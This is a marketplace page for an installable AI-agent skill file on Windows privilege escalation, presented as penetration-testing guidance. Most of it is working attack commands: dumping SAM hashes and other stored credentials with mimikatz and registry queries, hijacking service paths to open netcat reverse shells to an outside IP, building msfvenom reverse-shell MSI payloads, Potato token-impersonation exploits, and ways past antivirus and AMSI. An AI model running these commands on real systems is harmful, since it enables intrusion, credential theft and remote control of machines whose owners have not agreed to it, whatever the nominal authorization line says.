How do I install Windows Privilege Escalation?

Install Windows Privilege Escalation with a single command: npx mdskills install sickn33/windows-privilege-escalation. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support Windows Privilege Escalation?

Windows Privilege Escalation works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

Windows Privilege Escalation

Name: Windows Privilege Escalation: AI Agent Skill
Rating: 8 (1 reviews)
Author: sickn33

Verified

Testing & QAIntermediate

This skill should be used when the user asks to "escalate privileges on Windows," "find Windows privesc vectors," "enumerate Windows for privilege escalation," "exploit Windows misconfigurations," or "perform post-exploitation privilege escalation." It provides comprehensive guidance for discovering and exploiting privilege escalation vulnerabilities in Windows environments.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/windows-privilege-escalation

Fork & Edit

Skill Advisor8.0

Comprehensive privilege escalation reference with detailed commands and techniques

+Provides extensive enumeration commands and exploitation techniques across multiple vectors
+Includes well-organized quick reference tables for tools and common vulnerabilities
+Covers modern exploits like HiveNightmare and Potato variants with specific syntax
-Lacks conditional logic or decision trees for when to apply specific techniques
-Does not address evasion strategies despite mentioning AV/EDR detection risks

SKILL.md

Edit in Browser

1---
2name: Windows Privilege Escalation
3description: This skill should be used when the user asks to "escalate privileges on Windows," "find Windows privesc vectors," "enumerate Windows for privilege escalation," "exploit Windows misconfigurations," or "perform post-exploitation privilege escalation." It provides comprehensive guidance for discovering and exploiting privilege escalation vulnerabilities in Windows environments.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# Windows Privilege Escalation
10 
11## Purpose
12 
13Provide systematic methodologies for discovering and exploiting privilege escalation vulnerabilities on Windows systems during penetration testing engagements. This skill covers system enumeration, credential harvesting, service exploitation, token impersonation, kernel exploits, and various misconfigurations that enable escalation from standard user to Administrator or SYSTEM privileges.
14 
15## Inputs / Prerequisites
16 
17- **Initial Access**: Shell or RDP access as standard user on Windows system
18- **Enumeration Tools**: WinPEAS, PowerUp, Seatbelt, or manual commands
19- **Exploit Binaries**: Pre-compiled exploits or ability to transfer tools
20- **Knowledge**: Understanding of Windows security model and privileges
21- **Authorization**: Written permission for penetration testing activities
22 
23## Outputs / Deliverables
24 
25- **Privilege Escalation Path**: Identified vector to higher privileges
26- **Credential Dump**: Harvested passwords, hashes, or tokens
27- **Elevated Shell**: Command execution as Administrator or SYSTEM
28- **Vulnerability Report**: Documentation of misconfigurations and exploits
29- **Remediation Recommendations**: Fixes for identified weaknesses
30 
31## Core Workflow
32 
33### 1. System Enumeration
34 
35#### Basic System Information
36```powershell
37# OS version and patches
38systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
39wmic qfe
40 
41# Architecture
42wmic os get osarchitecture
43echo %PROCESSOR_ARCHITECTURE%
44 
45# Environment variables
46set
47Get-ChildItem Env: | ft Key,Value
48 
49# List drives
50wmic logicaldisk get caption,description,providername
51```
52 
53#### User Enumeration
54```powershell
55# Current user
56whoami
57echo %USERNAME%
58 
59# User privileges
60whoami /priv
61whoami /groups
62whoami /all
63 
64# All users
65net user
66Get-LocalUser | ft Name,Enabled,LastLogon
67 
68# User details
69net user administrator
70net user %USERNAME%
71 
72# Local groups
73net localgroup
74net localgroup administrators
75Get-LocalGroupMember Administrators | ft Name,PrincipalSource
76```
77 
78#### Network Enumeration
79```powershell
80# Network interfaces
81ipconfig /all
82Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
83 
84# Routing table
85route print
86Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric
87 
88# ARP table
89arp -A
90 
91# Active connections
92netstat -ano
93 
94# Network shares
95net share
96 
97# Domain Controllers
98nltest /DCLIST:DomainName
99```
100 
101#### Antivirus Enumeration
102```powershell
103# Check AV products
104WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
105```
106 
107### 2. Credential Harvesting
108 
109#### SAM and SYSTEM Files
110```powershell
111# SAM file locations
112%SYSTEMROOT%\repair\SAM
113%SYSTEMROOT%\System32\config\RegBack\SAM
114%SYSTEMROOT%\System32\config\SAM
115 
116# SYSTEM file locations
117%SYSTEMROOT%\repair\system
118%SYSTEMROOT%\System32\config\SYSTEM
119%SYSTEMROOT%\System32\config\RegBack\system
120 
121# Extract hashes (from Linux after obtaining files)
122pwdump SYSTEM SAM > sam.txt
123samdump2 SYSTEM SAM -o sam.txt
124 
125# Crack with John
126john --format=NT sam.txt
127```
128 
129#### HiveNightmare (CVE-2021-36934)
130```powershell
131# Check vulnerability
132icacls C:\Windows\System32\config\SAM
133# Vulnerable if: BUILTIN\Users:(I)(RX)
134 
135# Exploit with mimikatz
136mimikatz> token::whoami /full
137mimikatz> misc::shadowcopies
138mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
139```
140 
141#### Search for Passwords
142```powershell
143# Search file contents
144findstr /SI /M "password" *.xml *.ini *.txt
145findstr /si password *.xml *.ini *.txt *.config
146 
147# Search registry
148reg query HKLM /f password /t REG_SZ /s
149reg query HKCU /f password /t REG_SZ /s
150 
151# Windows Autologin credentials
152reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
153 
154# PuTTY sessions
155reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
156 
157# VNC passwords
158reg query "HKCU\Software\ORL\WinVNC3\Password"
159reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
160 
161# Search for specific files
162dir /S /B *pass*.txt == *pass*.xml == *cred* == *vnc* == *.config*
163where /R C:\ *.ini
164```
165 
166#### Unattend.xml Credentials
167```powershell
168# Common locations
169C:\unattend.xml
170C:\Windows\Panther\Unattend.xml
171C:\Windows\Panther\Unattend\Unattend.xml
172C:\Windows\system32\sysprep.inf
173C:\Windows\system32\sysprep\sysprep.xml
174 
175# Search for files
176dir /s *sysprep.inf *sysprep.xml *unattend.xml 2>nul
177 
178# Decode base64 password (Linux)
179echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d
180```
181 
182#### WiFi Passwords
183```powershell
184# List profiles
185netsh wlan show profile
186 
187# Get cleartext password
188netsh wlan show profile <SSID> key=clear
189 
190# Extract all WiFi passwords
191for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Key" | find /v "Number" & echo.) & @echo on
192```
193 
194#### PowerShell History
195```powershell
196# View PowerShell history
197type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
198cat (Get-PSReadlineOption).HistorySavePath
199cat (Get-PSReadlineOption).HistorySavePath | sls passw
200```
201 
202### 3. Service Exploitation
203 
204#### Incorrect Service Permissions
205```powershell
206# Find misconfigured services
207accesschk.exe -uwcqv "Authenticated Users" * /accepteula
208accesschk.exe -uwcqv "Everyone" * /accepteula
209accesschk.exe -ucqv <service_name>
210 
211# Look for: SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG
212 
213# Exploit vulnerable service
214sc config <service> binpath= "C:\nc.exe -e cmd.exe 10.10.10.10 4444"
215sc stop <service>
216sc start <service>
217```
218 
219#### Unquoted Service Paths
220```powershell
221# Find unquoted paths
222wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\"
223wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
224 
225# Exploit: Place malicious exe in path
226# For path: C:\Program Files\Some App\service.exe
227# Try: C:\Program.exe or C:\Program Files\Some.exe
228```
229 
230#### AlwaysInstallElevated
231```powershell
232# Check if enabled
233reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
234reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
235 
236# Both must return 0x1 for vulnerability
237 
238# Create malicious MSI
239msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o evil.msi
240 
241# Install (runs as SYSTEM)
242msiexec /quiet /qn /i C:\evil.msi
243```
244 
245### 4. Token Impersonation
246 
247#### Check Impersonation Privileges
248```powershell
249# Look for these privileges
250whoami /priv
251 
252# Exploitable privileges:
253# SeImpersonatePrivilege
254# SeAssignPrimaryTokenPrivilege
255# SeTcbPrivilege
256# SeBackupPrivilege
257# SeRestorePrivilege
258# SeCreateTokenPrivilege
259# SeLoadDriverPrivilege
260# SeTakeOwnershipPrivilege
261# SeDebugPrivilege
262```
263 
264#### Potato Attacks
265```powershell
266# JuicyPotato (Windows Server 2019 and below)
267JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.10.10 4444 -e cmd.exe" -t *
268 
269# PrintSpoofer (Windows 10 and Server 2019)
270PrintSpoofer.exe -i -c cmd
271 
272# RoguePotato
273RoguePotato.exe -r 10.10.10.10 -e "C:\nc.exe 10.10.10.10 4444 -e cmd.exe" -l 9999
274 
275# GodPotato
276GodPotato.exe -cmd "cmd /c whoami"
277```
278 
279### 5. Kernel Exploitation
280 
281#### Find Kernel Vulnerabilities
282```powershell
283# Use Windows Exploit Suggester
284systeminfo > systeminfo.txt
285python wes.py systeminfo.txt
286 
287# Or use Watson (on target)
288Watson.exe
289 
290# Or use Sherlock PowerShell script
291powershell.exe -ExecutionPolicy Bypass -File Sherlock.ps1
292```
293 
294#### Common Kernel Exploits
295```
296MS17-010 (EternalBlue) - Windows 7/2008/2003/XP
297MS16-032 - Secondary Logon Handle - 2008/7/8/10/2012
298MS15-051 - Client Copy Image - 2003/2008/7
299MS14-058 - TrackPopupMenu - 2003/2008/7/8.1
300MS11-080 - afd.sys - XP/2003
301MS10-015 - KiTrap0D - 2003/XP/2000
302MS08-067 - NetAPI - 2000/XP/2003
303CVE-2021-1732 - Win32k - Windows 10/Server 2019
304CVE-2020-0796 - SMBGhost - Windows 10
305CVE-2019-1388 - UAC Bypass - Windows 7/8/10/2008/2012/2016/2019
306```
307 
308### 6. Additional Techniques
309 
310#### DLL Hijacking
311```powershell
312# Find missing DLLs with Process Monitor
313# Filter: Result = NAME NOT FOUND, Path ends with .dll
314 
315# Compile malicious DLL
316# For x64: x86_64-w64-mingw32-gcc windows_dll.c -shared -o evil.dll
317# For x86: i686-w64-mingw32-gcc windows_dll.c -shared -o evil.dll
318```
319 
320#### Runas with Saved Credentials
321```powershell
322# List saved credentials
323cmdkey /list
324 
325# Use saved credentials
326runas /savecred /user:Administrator "cmd.exe /k whoami"
327runas /savecred /user:WORKGROUP\Administrator "\\10.10.10.10\share\evil.exe"
328```
329 
330#### WSL Exploitation
331```powershell
332# Check for WSL
333wsl whoami
334 
335# Set root as default user
336wsl --default-user root
337# Or: ubuntu.exe config --default-user root
338 
339# Spawn shell as root
340wsl whoami
341wsl python -c 'import os; os.system("/bin/bash")'
342```
343 
344## Quick Reference
345 
346### Enumeration Tools
347 
348| Tool | Command | Purpose |
349|------|---------|---------|
350| WinPEAS | `winPEAS.exe` | Comprehensive enumeration |
351| PowerUp | `Invoke-AllChecks` | Service/path vulnerabilities |
352| Seatbelt | `Seatbelt.exe -group=all` | Security audit checks |
353| Watson | `Watson.exe` | Missing patches |
354| JAWS | `.\jaws-enum.ps1` | Legacy Windows enum |
355| PrivescCheck | `Invoke-PrivescCheck` | Privilege escalation checks |
356 
357### Default Writable Folders
358 
359```
360C:\Windows\Temp
361C:\Windows\Tasks
362C:\Users\Public
363C:\Windows\tracing
364C:\Windows\System32\spool\drivers\color
365C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
366```
367 
368### Common Privilege Escalation Vectors
369 
370| Vector | Check Command |
371|--------|---------------|
372| Unquoted paths | `wmic service get pathname \| findstr /i /v """` |
373| Weak service perms | `accesschk.exe -uwcqv "Everyone" *` |
374| AlwaysInstallElevated | `reg query HKCU\...\Installer /v AlwaysInstallElevated` |
375| Stored credentials | `cmdkey /list` |
376| Token privileges | `whoami /priv` |
377| Scheduled tasks | `schtasks /query /fo LIST /v` |
378 
379### Impersonation Privilege Exploits
380 
381| Privilege | Tool | Usage |
382|-----------|------|-------|
383| SeImpersonatePrivilege | JuicyPotato | CLSID abuse |
384| SeImpersonatePrivilege | PrintSpoofer | Spooler service |
385| SeImpersonatePrivilege | RoguePotato | OXID resolver |
386| SeBackupPrivilege | robocopy /b | Read protected files |
387| SeRestorePrivilege | Enable-SeRestorePrivilege | Write protected files |
388| SeTakeOwnershipPrivilege | takeown.exe | Take file ownership |
389 
390## Constraints and Limitations
391 
392### Operational Boundaries
393- Kernel exploits may cause system instability
394- Some exploits require specific Windows versions
395- AV/EDR may detect and block common tools
396- Token impersonation requires service account context
397- Some techniques require GUI access
398 
399### Detection Considerations
400- Credential dumping triggers security alerts
401- Service modification logged in Event Logs
402- PowerShell execution may be monitored
403- Known exploit signatures detected by AV
404 
405### Legal Requirements
406- Only test systems with written authorization
407- Document all escalation attempts
408- Avoid disrupting production systems
409- Report all findings through proper channels
410 
411## Examples
412 
413### Example 1: Service Binary Path Exploitation
414```powershell
415# Find vulnerable service
416accesschk.exe -uwcqv "Authenticated Users" * /accepteula
417# Result: RW MyService SERVICE_ALL_ACCESS
418 
419# Check current config
420sc qc MyService
421 
422# Stop service and change binary path
423sc stop MyService
424sc config MyService binpath= "C:\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
425sc start MyService
426 
427# Catch shell as SYSTEM
428```
429 
430### Example 2: AlwaysInstallElevated Exploitation
431```powershell
432# Verify vulnerability
433reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
434reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
435# Both return: 0x1
436 
437# Generate payload (attacker machine)
438msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o shell.msi
439 
440# Transfer and execute
441msiexec /quiet /qn /i C:\Users\Public\shell.msi
442 
443# Catch SYSTEM shell
444```
445 
446### Example 3: JuicyPotato Token Impersonation
447```powershell
448# Verify SeImpersonatePrivilege
449whoami /priv
450# SeImpersonatePrivilege Enabled
451 
452# Run JuicyPotato
453JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe 10.10.10.10 4444 -e cmd.exe" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
454 
455# Catch SYSTEM shell
456```
457 
458### Example 4: Unquoted Service Path
459```powershell
460# Find unquoted path
461wmic service get name,pathname | findstr /i /v """
462# Result: C:\Program Files\Vuln App\service.exe
463 
464# Check write permissions
465icacls "C:\Program Files\Vuln App"
466# Result: Users:(W)
467 
468# Place malicious binary
469copy C:\Users\Public\shell.exe "C:\Program Files\Vuln.exe"
470 
471# Restart service
472sc stop "Vuln App"
473sc start "Vuln App"
474```
475 
476### Example 5: Credential Harvesting from Registry
477```powershell
478# Check for auto-logon credentials
479reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
480# DefaultUserName: Administrator
481# DefaultPassword: P@ssw0rd123
482 
483# Use credentials
484runas /user:Administrator cmd.exe
485# Or for remote: psexec \\target -u Administrator -p P@ssw0rd123 cmd
486```
487 
488## Troubleshooting
489 
490| Issue | Cause | Solution |
491|-------|-------|----------|
492| Exploit fails (AV detected) | AV blocking known exploits | Use obfuscated exploits; living-off-the-land (mshta, certutil); custom compiled binaries |
493| Service won't start | Binary path syntax | Ensure space after `=` in binpath: `binpath= "C:\path\binary.exe"` |
494| Token impersonation fails | Wrong privilege/version | Check `whoami /priv`; verify Windows version compatibility |
495| Can't find kernel exploit | System patched | Run Windows Exploit Suggester: `python wes.py systeminfo.txt` |
496| PowerShell blocked | Execution policy/AMSI | Use `powershell -ep bypass -c "cmd"` or `-enc <base64>` |
497

Full transparency — inspect the skill content before installing.